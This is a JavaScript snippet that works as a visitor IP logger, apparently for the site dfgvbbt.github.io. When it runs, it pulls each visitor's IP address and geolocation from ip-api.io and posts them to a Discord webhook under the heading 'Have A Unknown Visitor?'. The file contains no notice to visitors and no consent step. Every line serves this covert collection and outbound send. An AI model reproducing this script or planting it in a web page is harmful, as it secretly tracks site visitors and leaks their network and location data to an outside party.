const request = new XMLHttpRequest();
request.open("POST", "https://discord.com/api/webhooks/?");

request.setRequestHeader('Content-type', 'application/json');

function httpGet(theUrl)
  {
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false ); // false for synchronous request
    xmlHttp.send( null );
    return xmlHttp.responseText;
  }
var Info = httpGet('https://ip-api.io/json')


const params = {
	username: "Logger dfgvbbt.github.io!",
	"content": "<t:"+Math.floor(Date.now()/1000)+">",
	"embeds": [{
    		"title": "**Have A Unknown Visitor?**",
		"fields": [
      		{
	        "name": "Location Client",
 	     	 "value": Info,
	       	 "inline": true
      		}
    		],
		"color": Math.floor(Math.random()*10000000)
  }]  
}

request.send(JSON.stringify(params));
